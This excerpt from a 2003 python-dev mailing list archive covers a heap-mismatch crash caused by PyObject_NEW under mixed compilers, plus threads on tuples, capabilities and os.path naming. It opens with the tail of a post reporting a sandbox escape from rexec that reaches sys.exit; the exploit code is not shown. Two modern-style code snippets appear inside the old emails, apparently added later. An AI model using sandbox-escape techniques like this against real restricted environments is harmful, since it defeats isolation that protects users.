ri.globals['candy'] = ProxyFactory(candy)
...

ri.ri_exec(code)

print "OK"
-- * --

There are no unproxied exceptions here. On the other hand, both rexec and the
prototype RestrictedInterpreter supply code with globals() [!], and apply() ...

I have some _even more baroque_ code (xpl2) that exploits candy and manages to
call sys.exit:

...>\usr\python22\python -i s.py xpl2
candy
Got sys.exit

...>

In this case xpl2 could be rewritten as a single expression of the form:

candy(...)

although that would make for a totally masochistic exercise and a totally
obfuscated Python entry. No, I haven't done or tried that :)

regards.


From dave@boost-consulting.com  Wed Mar 12 18:03:35 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 13:03:35 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 12:15:21 -0500")
References: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net>
Message-ID: <u8yvk798o.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [Guido]
>> You can read the source code as well as I can.
>
> Possibly, but not as well as I can <wink> -- the memory API's
> implementation is monumentally convoluted, especially before 2.3.
> Speaking of which, David, which version of Python was "someone"
> using?  

I was the one who discovered the problem, using Python 2.2.2.
Curiously, "someone" missed it because he was using vc6 instead of
vc7.

> Did they enable pymalloc?  

I don't think I did that.  I don't exactly know what pymalloc is.

> Did they give you a traceback (showing from where free() was
> called)?  

I can get one for you.  Here:

>	MSVCRTD.DLL!_free_dbg_lk(void * pUserData=0x00c46338, int nBlockUse=1)  Line 1044 + 0x30	C
 	MSVCRTD.DLL!_free_dbg(void * pUserData=0x00c46338, int nBlockUse=1)  Line 1001 + 0xd	C
 	MSVCRTD.DLL!free(void * pUserData=0x00c46338)  Line 956 + 0xb	C
 	python22_d.dll!_PyObject_Del(_object * op=0x00c46338)  Line 146 + 0xa	C
 	opaque_ext_d.pyd!dealloc(_object * self=0x00c46338)  Line 12 + 0xa	C++
 	python22_d.dll!_Py_Dealloc(_object * op=0x00c46338)  Line 1837 + 0x7	C
 	python22_d.dll!tupledealloc(PyTupleObject * op=0x0093c9a8)  Line 147 + 0x70	C
 	python22_d.dll!_Py_Dealloc(_object * op=0x0093c9a8)  Line 1837 + 0x7	C
 	python22_d.dll!do_call(_object * func=0x00c45e00, _object * * * pp_stack=0x0012edf8, int na=1, int nk=0)  Line 3273 + 0x43	C
 	python22_d.dll!eval_frame(_frame * f=0x008c2e68)  Line 2038 + 0x1e	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8, _object * * args=0x00000000, int argcount=0, _object * * kws=0x00000000, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!PyEval_EvalCode(PyCodeObject * co=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8)  Line 486 + 0x1f	C
 	python22_d.dll!exec_statement(_frame * f=0x008efbf0, _object * prog=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8)  Line 3668 + 0x11	C
 	python22_d.dll!eval_frame(_frame * f=0x008efbf0)  Line 1482 + 0x15	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008c79a8, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x00965a7c, int argcount=7, _object * * kws=0x00965a98, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095cc98, _object * * * pp_stack=0x0012f268, int n=7, int na=7, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00965900)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008c6fd8, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008d8c64, int argcount=5, _object * * kws=0x008d8c78, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x009551a8, _object * * * pp_stack=0x0012f494, int n=5, int na=5, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008d8af0)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008cee50, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008c75d8, int argcount=5, _object * * kws=0x008c75ec, int kwcount=0, _object * * defs=0x0092d7a4, int defcount=3, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x00955220, _object * * * pp_stack=0x0012f6c0, int n=5, int na=5, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008c7450)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008ddba0, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x0089582c, int argcount=3, _object * * kws=0x00895838, int kwcount=0, _object * * defs=0x0092e2cc, int defcount=1, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095a850, _object * * * pp_stack=0x0012f8ec, int n=3, int na=3, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008956a8)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008e3848, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008787f4, int argcount=1, _object * * kws=0x008787f8, int kwcount=0, _object * * defs=0x0092eaa4, int defcount=5, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095e620, _object * * * pp_stack=0x0012fb18, int n=1, int na=1, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00878690)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008ce618, _object * globals=0x0086f780, _object * locals=0x00000000, _object * * args=0x008777bc, int argcount=0, _object * * kws=0x008777bc, int kwcount=0, _object * * defs=0x0084e56c, int defcount=1, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x008736e8, _object * * * pp_stack=0x0012fd44, int n=0, int na=0, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00877660)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x0084d8a8, _object * globals=0x0086f780, _object * locals=0x0086f780, _object * * args=0x00000000, int argcount=0, _object * * kws=0x00000000, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!PyEval_EvalCode(PyCodeObject * co=0x0084d8a8, _object * globals=0x0086f780, _object * locals=0x0086f780)  Line 486 + 0x1f	C
 	python22_d.dll!run_node(_node * n=0x0088e730, char * filename=0x00842def, _object * globals=0x0086f780, _object * locals=0x0086f780, PyCompilerFlags * flags=0x0012ff38)  Line 1079 + 0x11	C
 	python22_d.dll!run_err_node(_node * n=0x0088e730, char * filename=0x00842def, _object * globals=0x0086f780, _object * locals=0x0086f780, PyCompilerFlags * flags=0x0012ff38)  Line 1066 + 0x19	C
 	python22_d.dll!PyRun_FileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int start=257, _object * globals=0x0086f780, _object * locals=0x0086f780, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 1057 + 0x19	C
 	python22_d.dll!PyRun_SimpleFileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 686 + 0x22	C
 	python22_d.dll!PyRun_AnyFileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 495 + 0x15	C
 	python22_d.dll!Py_Main(int argc=2, char * * argv=0x00842db8)  Line 367 + 0x30	C
 	python_d.exe!main(int argc=2, char * * argv=0x00842db8)  Line 10 + 0xd	C
 	python_d.exe!mainCRTStartup()  Line 338 + 0x11	C
 	kernel32.dll!77e814c7() 	


> Was it even freeing a Python object at the time?  

Yup.

> In what code base did someone make this substitution (e.g., Python
> core, Boost sources, someone's own extension module, someone else's
> extension module)?

Boost sources

> The straight answer to your question is no.  A nastier answer is
> that many memory mgmt screwups are shy, and can be triggered by
> seemingly irrelevant changes.

Both answers seem to amount to "'someone' must have a bug in his
code".  Am I reading that correctly?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 18:18:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 13:18:29 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <u8yvk798o.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>

[David Abrahams]
> I was the one who discovered the problem, using Python 2.2.2.
> Curiously, "someone" missed it because he was using vc6 instead of
> vc7.

So you were using VC7.  If so, using it for what?  Every stick of code in
question, or were you mixing VC7-compiled code with VC6-compiled code?  If
the latter, talk to Microsoft (by most accounts their runtime support
libraries aren't compatible with each other).

[traceback freeing a tuple]

> Both answers seem to amount to "'someone' must have a bug in his
> code".  Am I reading that correctly?

Yes, for the right meaning of "someone".  Possibilities beyond you include
Python and Microsoft.  Best guess I can make based on what you haven't told
us yet is that you were mixing the released Python 2.2.2 Windows core DLL
(built with MSVC6) with extension code using MSVC7 C runtime libraries.
Right or wrong?


From dave@boost-consulting.com  Wed Mar 12 18:42:53 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 13:42:53 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:18:29 -0500")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
Message-ID: <uvfyo5suq.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> I was the one who discovered the problem, using Python 2.2.2.
>> Curiously, "someone" missed it because he was using vc6 instead of
>> vc7.
>
> So you were using VC7.  If so, using it for what?  Every stick of code in
> question, or were you mixing VC7-compiled code with VC6-compiled
> code?  

Python was compiled with vc6, the rest with vc7.  I test this
combination regularly and have never seen a problem.

> If the latter, talk to Microsoft (by most accounts their runtime
> support libraries aren't compatible with each other).

Sure, but that's only an issue if you are allocating resources in one
runtime lib and deallocating in another AFAIK.  There's nothing
beyond memory allocation going on here, and the type object in
question has a custom deallocator which goes to the same runtime that
allocated it.

>> Both answers seem to amount to "'someone' must have a bug in his
>> code".  Am I reading that correctly?
>
> Yes, for the right meaning of "someone".  Possibilities beyond you include
> Python and Microsoft.  Best guess I can make based on what you haven't told
> us yet is that you were mixing the released Python 2.2.2 Windows core DLL
> (built with MSVC6) with extension code using MSVC7 C runtime libraries.
> Right or wrong?

Totally and absolutely right.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 18:57:34 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 13:57:34 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyo5suq.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net>

[David Abrahams]
> Python was compiled with vc6, the rest with vc7.  I test this
> combination regularly and have never seen a problem.

You have now <wink>.

> Sure, but that's only an issue if you are allocating resources in one
> runtime lib and deallocating in another AFAIK.  There's nothing
> beyond memory allocation going on here, and the type object in
> question has a custom deallocator which goes to the same runtime that
> allocated it.

See my later msg -- returning memory to a heap it wasn't obtained from is
fatal enough.  The object memory itself is in question here, not memory
allocated *by* the object.  Look at the traceback you sent if the
distinction isn't clear.
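
A toy model of the failure, written in Python rather than against the C API. It assumes the theory discussed in this thread: the macro expands to an allocation compiled into the extension, while the function versions allocate and free inside the core DLL. ToyHeap and the heap names are hypothetical; nothing here is a real allocator.

```python
class ToyHeap:
    """Toy stand-in for one C runtime's debug heap (not a real allocator)."""

    def __init__(self, name):
        self.name = name
        self._live = set()      # blocks this heap has handed out
        self._next_id = 0

    def malloc(self):
        self._next_id += 1
        block = (self.name, self._next_id)
        self._live.add(block)
        return block

    def free(self, block):
        # A debug heap checks that the block is one of its own.
        if block not in self._live:
            raise RuntimeError(f"{self.name}: freeing a block I never allocated")
        self._live.remove(block)


core_heap = ToyHeap("runtime A")        # runtime linked into the core DLL
extension_heap = ToyHeap("runtime B")   # runtime linked into the extension

# Function-style: allocation and deallocation both happen inside the core.
obj = core_heap.malloc()
core_heap.free(obj)

# Macro-style: allocation happens in the extension, deallocation in the core.
obj = extension_heap.malloc()
try:
    core_heap.free(obj)
    mismatch_detected = False
except RuntimeError:
    mismatch_detected = True
```

The object memory itself crosses the heap boundary in the second case, which is the situation the traceback shows.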


From dave@boost-consulting.com  Wed Mar 12 19:08:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 14:08:00 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:49:22 -0500")
References: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net>
Message-ID: <uk7f45rov.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> Question:  I don't have VC7 and don't know what it does.  The traceback
> ended in MSVCRTD.DLL, which I recognize as MS's debug-mode C runtime DLL for
> VC6.  Does VC7 use the same DLL name, or some other DLL name?  

The same one.

> If the latter, my theory is that PyObject_New used the MSVC6 malloc,
> but that PyObject_NEW used the MSVC7 malloc (due to macro expansion
> in your code).  

Brilliant theory!

> In both cases the MSVC6 free() gets called.  

Ah, correct.  I misread "someone's" code; the delete function just
calls PyObject_Del().  I think "someone" probably ought to do
something more explicit to control where things are allocated/freed.
But for now, I think using PyObject_New/PyObject_Del is reasonable.

> But the MSVC6 and MSVC7 heaps are distinct, so the debug-mode MSVC6
> free() complains because it wasn't the source of the memory getting
> freed.  A missing piece of the puzzle: what was the error msg at the
> time this thing died?

unhandled exception at 0x10213638 (MSVCRTD.DLL) in python_d.exe: User
breakpoint.

It seems to me that in light of all this, it's probably worth noting
this difference between PyObject_New and PyObject_NEW in the docs.
People *will* develop extension modules with different compilers from
the one Python was compiled with... I know, submit a patch.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Wed Mar 12 19:09:17 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 14:09:17 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:57:34 -0500")
References: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net>
Message-ID: <uhea85rmq.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

>> Sure, but that's only an issue if you are allocating resources in one
>> runtime lib and deallocating in another AFAIK.  There's nothing
>> beyond memory allocation going on here, and the type object in
>> question has a custom deallocator which goes to the same runtime that
>> allocated it.
>
> See my later msg -- returning memory to a heap it wasn't obtained from is
> fatal enough.  

I think that's exactly what I said.

> The object memory itself is in question here, not memory
> allocated *by* the object.  

I think that's also exactly what I thought.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 19:26:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 14:26:22 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uk7f45rov.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>

[David Abrahams]
> ...
> It seems to me that in light of all this, it's probably worth noting
> this difference between PyObject_New and PyObject_NEW in the docs.

I don't think the macro versions should ever be used outside the core.
Inside the core, it's safe.  So I think the "doc bug" is that the docs
mention PyObject_NEW at all.

> People *will* develop extension modules with different compilers from
> the one Python was compiled with...

Yup.

> I know, submit a patch.

That would be a sociable thing.


From skip@pobox.com  Wed Mar 12 19:40:10 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 13:40:10 -0600
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uk7f45rov.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net>
 <uk7f45rov.fsf@boost-consulting.com>
Message-ID: <15983.36122.138471.586434@montanaro.dyndns.org>

    David> But for now, I think using PyObject_New/PyObject_Del is
    David> reasonable.

Or perhaps PyObject_NEW/PyObject_DEL.

S


From theller@python.net  Wed Mar 12 19:52:47 2003
From: theller@python.net (Thomas Heller)
Date: 12 Mar 2003 20:52:47 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
Message-ID: <7kb4z7jk.fsf@python.net>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
> > ...
> > It seems to me that in light of all this, it's probably worth noting
> > this difference between PyObject_New and PyObject_NEW in the docs.
> 
> I don't think the macro versions should ever be used outside the core.
> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> mention PyObject_NEW at all.
> 

Better to explicitly warn about them with a wording similar to that
from section 9.2, Memory Interface:

  In addition, the following macro sets are provided for calling the
  Python memory allocator directly, without involving the C API
  functions listed above. However, note that their use does not preserve
  binary compatibility across Python versions [] and is therefore
  deprecated in extension modules.

Maybe 'and compilers' should be inserted between the [].

Thomas


From greg@cosc.canterbury.ac.nz  Wed Mar 12 21:27:31 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 10:27:31 +1300 (NZDT)
Subject: How long is your shopping tuple? (Re: [Python-Dev] Ridiculously minor tweaks?)
In-Reply-To: <3E6EABEE.2040108@tismer.com>
Message-ID: <200303122127.h2CLRVZ02250@oma.cosc.canterbury.ac.nz>

Guido:
> Tuples are for heterogeneous data, lists are for homogeneous data.
> Tuples are *not* read-only lists.

Weird things are happening in my brain this morning. After
reading this thread, I was replying to something unrelated
and had the occasion to use the phrase "It's on my list"...
and I briefly wondered whether I should use the word
"tuple" instead!

Somehow "It's on my tuple" doesn't have quite the same
ring to it. So, yes, tuples ARE different from lists...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Wed Mar 12 21:29:25 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 10:29:25 +1300 (NZDT)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E6F5F48.7040001@algroup.co.uk>
Message-ID: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>

Ben Laurie <ben@algroup.co.uk>:

> If I understand them correctly, a Zope proxy where the security checker 
> always says "yes" is a capability. Except, possibly, they may be 
> forgeable, I don't know them well enough to know.

A security checker that could be easily forged wouldn't
be very, er, secure, would it?-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Wed Mar 12 21:33:50 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 12 Mar 2003 22:33:50 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyo5suq.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
Message-ID: <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Sure, but that's only an issue if you are allocating resources in one
> runtime lib and deallocating in another AFAIK.  

No. You also cannot pass struct FILE* from one C library to the other;
file locking will then crash.

Regards,
Martin


From brett@python.org  Wed Mar 12 21:36:59 2003
From: brett@python.org (Brett Cannon)
Date: Wed, 12 Mar 2003 13:36:59 -0800 (PST)
Subject: [Python-Dev] Care to sprint on the core at PyCon?
Message-ID: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>

Four members of PythonLabs will be at the pre-PyCon sprint (more info on
sprints at http://www.python.org/cgi-bin/moinmoin/SprintPlan ) running one
for the Python core.  If you would like to attend, email me at
brett@python.org to say so.  You must be registered for PyCon to be able
to attend.  And please do this ASAP so we can get the ball rolling on this
and lock down who will be there.

And regardless whether you care to attend or not, please look at
http://www.python.org/cgi-bin/moinmoin/PyCoreSprint and make suggestions
on what the group should sprint on.

-Brett


From jeremy@zope.com  Wed Mar 12 21:43:38 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 12 Mar 2003 16:43:38 -0500
Subject: [Python-Dev] Care to sprint on the core at PyCon?
In-Reply-To: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>
Message-ID: <1047505418.21994.150.camel@slothrop.zope.com>

On Wed, 2003-03-12 at 16:36, Brett Cannon wrote:
> Four members of PythonLabs will be at the pre-PyCon sprint (more info on
> sprints at http://www.python.org/cgi-bin/moinmoin/SprintPlan ) running one
> for the Python core.  If you would like to attend, email me at
> brett@python.org to say so.  You must be registered for PyCon to be able
> to attend.  And please do this ASAP so we can get the ball rolling on this
> and lock down who will be there.

Thanks for taking this up!  There is still some room for sprinters.

> And regardless whether you care to attend or not, please look at
> http://www.python.org/cgi-bin/moinmoin/PyCoreSprint and make suggestions
> on what the group should sprint on.

I would like to do some sprinting on the ast branch, which I noted in
the wiki.

Jeremy


From dave@boost-consulting.com  Wed Mar 12 22:15:12 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 17:15:12 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "12 Mar 2003 22:33:50 +0100")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
Message-ID: <u65qo5j0v.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. Löwis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Sure, but that's only an issue if you are allocating resources in one
>> runtime lib and deallocating in another AFAIK.
>
> No. You also cannot pass struct FILE* from one C library to the other;
> file locking will then crash.

A file is a resource.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From greg@cosc.canterbury.ac.nz  Thu Mar 13 01:51:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 14:51:27 +1300 (NZDT)
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>
Message-ID: <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>

Kevin Altis <altis@semi-retired.com>:

> Pity the functions aren't named
> os.path.head and os.path.tail.

It wouldn't be entirely clear what they mean even then --
"head" might mean just the first pathname component.

In a tool I wrote some years ago in Scheme, I called
them "filename-directory" and "filename-nondirectory".
Which suffered from the same problem, really (they
didn't consult the file system either). But it didn't
matter, since I was the only person who used them,
and *I* knew what they meant. :-)

Maybe they should be called 
"all_except_the_last_pathname_component"
and "last_pathname_component"?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+
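
A minimal sketch of the behaviour discussed above, assuming a POSIX-style
path syntax (hence posixpath rather than os.path, so the result does not
depend on the host OS). The helper name split_path is made up for
illustration; it only wraps the existing dirname/basename pair and shows
that both work on the string alone, without consulting the file system.

```python
import posixpath  # POSIX flavour of os.path; pure string manipulation


def split_path(path):
    """Return (all_except_the_last_pathname_component, last_pathname_component)."""
    return posixpath.dirname(path), posixpath.basename(path)


# The path need not exist: only the string is inspected.
print(split_path("/no/such/dir/file.txt"))   # ('/no/such/dir', 'file.txt')

# A trailing slash leaves an empty last component, the surprising case.
print(split_path("/usr/lib/"))               # ('/usr/lib', '')

# "head" in the sense of "first pathname component" is something else again.
print("/usr/lib/python".strip("/").split("/")[0])   # usr
```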


From skip@pobox.com  Thu Mar 13 03:38:43 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 21:38:43 -0600
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>
References: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>
 <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>
Message-ID: <15983.64835.715338.915063@montanaro.dyndns.org>

    Greg> Kevin Altis <altis@semi-retired.com>:
    >> Pity the functions aren't named os.path.head and os.path.tail.

    Greg> It wouldn't be entirely clear what they mean even then -- "head"
    Greg> might mean just the first pathname component.
    ...
    Greg> Maybe they should be called
    Greg> "all_except_the_last_pathname_component" and
    Greg> "last_pathname_component"?

I know, how about car and cdr? ;-)

Skip


From martin@v.loewis.de  Thu Mar 13 07:46:13 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 13 Mar 2003 08:46:13 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <u65qo5j0v.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
 <u65qo5j0v.fsf@boost-consulting.com>
Message-ID: <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> martin@v.loewis.de (Martin v. Löwis) writes:
>
> > David Abrahams <dave@boost-consulting.com> writes:
> >
> >> Sure, but that's only an issue if you are allocating resources in one
> >> runtime lib and deallocating in another AFAIK.
> >
> > No. You also cannot pass struct FILE* from one C library to the other;
> > file locking will then crash.
>
> A file is a resource.

Yes, but printf is neither allocation nor deallocation.

Regards,
Martin


From ben@algroup.co.uk  Thu Mar 13 10:47:59 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 13 Mar 2003 10:47:59 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>
References: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>
Message-ID: <3E7061DF.8020207@algroup.co.uk>

Greg Ewing wrote:
> Ben Laurie <ben@algroup.co.uk>:
> 
> 
>>If I understand them correctly, a Zope proxy where the security checker 
>>always says "yes" is a capability. Except, possibly, they may be 
>>forgeable, I don't know them well enough to know.
> 
> 
> A security checker that could be easily forged wouldn't
> be very, er, secure, would it?-)

It's the proxy that needs to be unforgeable. And since their model is 
role-based, I assume it's not a fundamental requirement for them.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mwh@python.net  Thu Mar 13 11:02:31 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 11:02:31 +0000
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 14:26:22 -0500")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
Message-ID: <2mvfynedh4.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> ...
>> It seems to me that in light of all this, it's probably worth noting
>> this difference between PyObject_New and PyObject_NEW in the docs.
>
> I don't think the macro versions should ever be used outside the core.
> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> mention PyObject_NEW at all.

What, precisely, does PyObject_NEW save you?  From a brief squint at
the sources, my best guess is "nothing" -- and it may even be a
pessimization due to increased code size.

Maybe we could kill it entirely (after the usual round of
deprecations, of course).

Cheers,
M.

-- 
  Like most people, I don't always agree with the BDFL (especially
  when he wants to change things I've just written about in very 
  large books), ... 
         -- Mark Lutz, http://python.oreilly.com/news/python_0501.html


From dave@boost-consulting.com  Thu Mar 13 12:28:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 07:28:00 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
